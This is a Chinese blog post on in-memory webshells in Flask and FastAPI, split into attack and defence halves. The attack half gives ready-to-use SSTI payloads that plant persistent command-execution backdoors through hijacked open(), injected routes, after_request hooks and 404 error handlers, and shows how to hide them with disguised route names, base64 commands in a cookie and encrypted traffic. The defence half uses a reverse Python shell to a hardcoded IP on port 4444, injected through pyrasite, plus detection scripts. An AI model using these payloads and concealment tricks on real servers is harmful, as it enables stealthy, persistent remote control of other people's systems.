欢迎来到7N的个人博客!

浅谈Flask内存马中的攻与防


avatar
7ech_N3rd 2024-12-19 400

Red Team

受限于篇幅,我这里就简单介绍一下flask内存马的几种姿势,以ssti为例子,本质上还是调用exec,eval,compile这些内置底层函数
参考了这篇文章,写的不错:Flask 内存马 - caterpie的小站

函数劫持式(各路后端框架通用)

参考至:https://err0r233.github.io/posts/25143.html 目前全文没有相关思路,我只这里直接劫持底层的open()函数例如在flask中

{{lipsum.__globals__['__builtins__']['exec']("global original_open
original_open=globals()['__builtins__']['open']
def custom_open(*args,**kwargs):
        from flask import request
        if request.query_params.get("cmd"):return __import__('io').StringIO(__import__('os').popen(request.query_params.get("cmd")).read())
        else:return original_open(*args,**kwargs)

globals()['__builtins__']['open']=custom_open")}}

这样再任何有返回open()文件内容的地方,就会输出cmd参数命令执行的结果了而且不会影响文件正常执行
稍加改动就可以在fastapi上动了

config.__init__.__globals__['__builtins__']['exec']("global original_open
original_open=globals()['__builtins__']['open']
def custom_open(*args,**kwargs):
        if request.query_params.get('cmd'):return __import__('io').StringIO(__import__('os').popen(request.query_params.get('cmd')).read())
        else:return original_open(*args,**kwargs)

globals()['__builtins__']['open']=custom_open",{"request":request})

添加路由式(flask高版本)

经典中的经典,但由于flask添加了保护机制,我们需要通过先操作url_map:

url_for.__globals__['__builtins__']['eval'](
    "app.url_map.add(
        app.url_rule_class('/shell', methods=['GET'], endpoint='shell')
    )",
    {
        'app':url_for.__globals__['current_app']
    }
)

再去add_rule:

url_for.__globals__['__builtins__']['eval'](
    "app.view_functions.update(
        {
            'shell': lambda:__import__('os').popen(
                app.request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami')
            ).read()
        }
    )",
    {
        'app':url_for.__globals__['current_app']
    }
)

after_request式

这个比较安全,在业务逻辑处理完成后再去到木马代码

{{url_for.__globals__['__builtins__']['eval']("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(\"global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(request.args.get(\'cmd\')).read())\")==None else resp)",{'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}

错误触发式

这个隐蔽性高,只有访问错误的界面才会触发,比如404

{{url_for.__globals__['__builtins__']['exec']("global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda error:__import__('os').popen(request.args.get('qwq')).read()", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}

如何隐匿flask内存马?

例如我可以改成常见的路由:比如/api/log伪装成日志记录的api

url_for.__globals__['__builtins__']['eval'](
    "app.view_functions.update(
        {
            'api/user/log': lambda:__import__('os').popen(
                app.request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami')
            ).read()
        }
    )",
    {
        'app':url_for.__globals__['current_app']
    }
)

而且我们不要让命令和接受命令的参数为明文

{{url_for.__globals__['__builtins__']['exec']("global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda error: __import__('os').popen(__import__('base64').b64decode(request.cookies.get('userinfo')).decode('utf-8')).read()", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}

例如我在这里加入了从cookie读取,userinfo作为用户传参。而且结合errhandler,你只要随便访问一个不存在的路由就能触发内存马,这样就可以根据被攻击服务的实时情况,来随时调整,例如/api/AccoutINFO,/getData...
你还可以通过异或加密输入和使用json格式配合flask原生的加解密返回来实现流量层级的隐匿

global exc_class
global code
from itsdangerous import URLSafeSerializer
from flask import request
import json
exc_class, code = app._get_exc_class_and_code(404)
secret_key=''.join(chr(ord(a) ^ ord(b)) for a, b in zip('M8):M2uY[2%<^4+',',M[U?SX4>_VT;XG'))
def execute_command(cmd,secret_key):
    serializer = URLSafeSerializer(secret_key)
    encrypted_userinfo=cmd
    if not encrypted_userinfo:
        return
    try:
        command = serializer.loads(encrypted_userinfo)
    except Exception as e:
        data = {
            'status': 'error',
            'message': 'Decryption failed',
            'result': ''
        }
    try:
        result=None
        eval(command)
    except Exception as e:
        data = {
            'status': 'error',
            'message': str(e),
            'result': ''
        }
    data = {
        'status': 'ok',
        'result': serializer.dumps(result)
    }
    return json.dumps(data)
app.error_handler_spec[None][code][exc_class] = lambda error: execute_command(request.cookies.get('userinfo'), secret_key)

#{{url_for.__globals__['__builtins__']['exec']("global exc_class\nglobal code\nfrom itsdangerous import URLSafeSerializer\nfrom flask import request\nimport json\nexc_class,code=app._get_exc_class_and_code(404)\nsecret_key=''.join(chr(ord(a)^ord(b))for(a,b)in zip('M8):M2uY[2%<^4+',',M[U?SX4>_VT;XG'))\ndef execute_command(cmd,secret_key):\n\tD='error';C='message';B='result';A='status';serializer=URLSafeSerializer(secret_key);encrypted_userinfo=cmd\n\tif not encrypted_userinfo:return\n\ttry:command=serializer.loads(encrypted_userinfo)\n\texcept Exception as e:data={A:D,C:'Decryption failed',B:''}\n\ttry:result=None;eval(command)\n\texcept Exception as e:data={A:D,C:str(e),B:''}\n\tdata={A:'ok',B:serializer.dumps(result)};return json.dumps(data)\napp.error_handler_spec[None][code][exc_class]=lambda error:execute_command(request.cookies.get('userinfo'),secret_key)", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}

不过也有现成的pythonshell管理工具就是了,那个思路也不错
orzchen/PyMemShell: Python内存马管理工具 Python MemShell

Blue Team

从内存取证

想要根除内存马当然是去内存找啦,什么流量分析都是隔靴搔痒
目前这部分内容是全网独一家的研究,我自己是比较偏向于使用pyrasite这个库配合自己的脚本实现的

#!/usr/bin/env python3

import socket
import sys
import os
import code
def reverse_python_shell(target_ip, target_port):
    try:
        # 创建套接字并连接到监听端
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, target_port))

        # 将标准输入、输出、错误重定向到套接字
        sock_file = sock.makefile("rw")
        sys.stdin = sock_file
        sys.stdout = sock_file
        sys.stderr = sock_file

        # 打印欢迎信息
        print(f"Connected to {target_ip}:{target_port}")
        print("Python interactive shell is ready. Type Python code to execute.")

        # 启动 Python 交互式解释器
        shell =code.InteractiveConsole(globals())
        shell.interact()

    except Exception as e:
        # 如果发生错误,发送错误信息并关闭连接
        try:
            sock.sendall(f"Error: {str(e)}\n".encode())
        except:
            pass
        finally:
            sock.close()

if __name__ == "__main__":
    # 配置目标 IP 和端口
    target_ip = "192.168.239.199"  # 替换为监听端的 IP
    target_port = 4444           # 替换为监听端的端口

    reverse_python_shell(target_ip, target_port)

将上述代码保存为shell-rev-py.py并且开好nc接受,然后再安装了pyrasite库的情况下直接注入
python进程:

pyrasite (pgrep -f "python3") shell-rev-py.py --verbose

便可大功告成

PS C:\Users\20232\Desktop> ncat -lvvp 4444
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.239.199:26475.
Connected to 192.168.239.199:4444
Python interactive shell is ready. Type Python code to execute.
Python 3.12.7 (main, Nov  8 2024, 17:55:36) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
(InteractiveConsole)
>>>

首先拿我们的errorhandler开杀
我们只要对上述代码稍加改动:

global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);
memshell=app.error_handler_spec[None][code][exc_class]

并且结合反汇编:

import dis
dis.dis(memshell)
>>> memshell=app.error_handler_spec[None][code][exc_class]
>>> dis.dis(memshell)
 16           0 RESUME                   0
              2 LOAD_GLOBAL              1 (NULL + execute_command)
             12 LOAD_GLOBAL              2 (request)
             22 LOAD_ATTR                4 (cookies)
             42 LOAD_ATTR                7 (NULL|self + get)
             62 LOAD_CONST               1 ('userinfo')
             64 CALL                     1
             72 LOAD_GLOBAL              8 (secret_key)
             82 CALL                     2
             90 RETURN_VALUE

便可让其露出马脚
同样的,针对before&after_request内存马,我们则可以使用:

>>> app.after_request_funcs
defaultdict(<class 'list'>, {None: [<function <lambda> at 0x7f4978b647c0>]})
>>> app.after_request_funcs
defaultdict(<class 'list'>, {None: [<function <lambda> at 0x7f4978b647c0>]})

而经典的路径内存马,我们则可以通过:
app.url_map.iter_rules()来查杀,配合反汇编

print("Registered routes:") for rule in app.url_map.iter_rules(): print(f"Endpoint: {rule.endpoint}, Methods: {rule.methods}, Rule: {rule.rule}")

还有一个思路就是去检查内存代码中对应的本地文件,配合原生的inspect模块

import inspect

# 假设发现了一个可疑的函数 suspicious_function
suspicious_function = app.view_functions["test"]

# 打印函数的来源
print("Function name:", suspicious_function.__name__)
print("Source file:", inspect.getfile(suspicious_function))
print("Source code:")
print(inspect.getsource(suspicious_function))

如果发现不存在就是内存马了
你也可以查看动态注入的路由

print("Registered endpoints and functions:")
for endpoint, func in app.view_functions.items():
    print(f"Endpoint: {endpoint}, Function: {func}, File: {inspect.getfile(func)}")

我总结了个排查脚本:

#!/usr/bin/env python3

import sys
import os
import base64
import dis
import inspect
from collections import defaultdict

OUTPUT_FILE = "/tmp/flask_memshell_analysis.txt"  # 输出文件路径

def save_to_file(data):
    """将数据保存到文件"""
    with open(OUTPUT_FILE, "a") as f:
        f.write(data + "\n")

def analyze_function(func, description):
    """分析函数,提取字节码和反汇编信息"""
    try:
        # 获取字节码
        bytecode = func.__code__.co_code
        bytecode_b64 = base64.b64encode(bytecode).decode()

        # 获取反汇编信息
        disassembled = dis.Bytecode(func)
        disassembled_str = "\n".join([f"{instr.opname} {instr.argrepr}" for instr in disassembled])

        # 保存结果
        save_to_file(f"=== {description} ===")
        save_to_file(f"Function: {func.__name__}")
        save_to_file(f"File: {inspect.getfile(func)}")
        save_to_file(f"Base64 Bytecode: {bytecode_b64}")
        save_to_file(f"Disassembled Bytecode:\n{disassembled_str}")
        save_to_file("\n")
    except Exception as e:
        save_to_file(f"Error analyzing function {func}: {str(e)}\n")

def check_dynamic_routes(app):
    """检查动态注册的路由"""
    save_to_file("=== Dynamic Routes ===")
    try:
        for rule in app.url_map.iter_rules():
            func = app.view_functions[rule.endpoint]
            save_to_file(f"Endpoint: {rule.endpoint}, Methods: {rule.methods}, Rule: {rule.rule}")
            analyze_function(func, f"Route Function ({rule.endpoint})")
    except Exception as e:
        save_to_file(f"Error checking routes: {str(e)}\n")

def check_before_request(app):
    """检查 before_request 中的函数"""
    save_to_file("=== Before Request ===")
    try:
        for func in app.before_request_funcs.get(None, []):
            analyze_function(func, "Before Request Function")
    except Exception as e:
        save_to_file(f"Error checking before_request: {str(e)}\n")

def check_after_request(app):
    """检查 after_request 中的函数"""
    save_to_file("=== After Request ===")
    try:
        for func in app.after_request_funcs.get(None, []):
            analyze_function(func, "After Request Function")
    except Exception as e:
        save_to_file(f"Error checking after_request: {str(e)}\n")

def check_error_handlers(app):
    """检查 errorhandler 中的函数"""
    save_to_file("=== Error Handlers ===")
    try:
        for code, handler_map in app.error_handler_spec[None].items():
            for exc_class, func in handler_map.items():
                analyze_function(func, f"Error Handler ({exc_class}, {code})")
    except Exception as e:
        save_to_file(f"Error checking error handlers: {str(e)}\n")

def main():
    """主函数"""
    save_to_file("=== Flask Memory Shell Analysis ===")
    save_to_file(f"Injected into process PID: {os.getpid()}\n")

    if 'app' not in globals():
        save_to_file("Error: No 'app' variable found in globals.\n")
        return

    app = globals()['app']
    save_to_file(f"Flask app detected: {repr(app)}\n")

    # 检查动态路由
    check_dynamic_routes(app)

    # 检查 before_request
    check_before_request(app)

    # 检查 after_request
    check_after_request(app)

    # 检查 errorhandler
    check_error_handlers(app)

    save_to_file("=== Analysis Complete ===\n")

if __name__ == "__main__":
    main()

同样的也可以查杀fastapi

import sys
import inspect
from fastapi.routing import APIRoute
from starlette.middleware.base import BaseHTTPMiddleware

def detect_middleware_injection(app):
    """
    检查 FastAPI 应用中的中间件,检测是否有恶意注入的中间件。
    """
    print("=== Checking Middlewares ===")
    for index, middleware in enumerate(app.user_middleware):
        try:
            dispatch_func = middleware.options.get("dispatch", None)
            if dispatch_func:
                print(f"Middleware {index}: {middleware.cls.__name__}")
                print(f"Dispatch function: {dispatch_func}")
                # 检查是否是动态定义的函数
                if inspect.isfunction(dispatch_func):
                    source_file = inspect.getfile(dispatch_func)
                    if source_file == "<string>":
                        print(f"  [ALERT] Middleware {index} has dynamically defined dispatch function!")
                        print(f"  Function source: {inspect.getsource(dispatch_func)}")
                    else:
                        print(f"  Source file: {source_file}")
        except Exception as e:
            print(f"Error analyzing middleware {index}: {e}")

def detect_route_injection(app):
    """
    检查 FastAPI 应用中的路由,检测是否有动态注入的路由。
    """
    print("=== Checking Routes ===")
    for route in app.routes:
        if isinstance(route, APIRoute):
            endpoint = route.endpoint
            try:
                # 检查路由的 endpoint 函数
                source_file = inspect.getfile(endpoint)
                if source_file == "<string>":
                    print(f"  [ALERT] Route {route.path} has dynamically defined endpoint!")
                    print(f"  Endpoint source: {inspect.getsource(endpoint)}")
                else:
                    print(f"  Route {route.path} -> Endpoint: {endpoint.__name__}")
                    print(f"  Source file: {source_file}")
            except Exception as e:
                print(f"Error analyzing route {route.path}: {e}")

def main():
    """
    主函数,执行所有检测逻辑。
    """
    if "app" not in sys.modules["__main__"].__dict__:
        print("Error: No FastAPI app instance found in the main module.")
        return

    app = sys.modules["__main__"].__dict__["app"]
    print(f"Detected FastAPI app: {app}")

    # 检查中间件
    detect_middleware_injection(app)

    # 检查路由
    detect_route_injection(app)

if __name__ == "__main__":
    main()

暂无评论

发表评论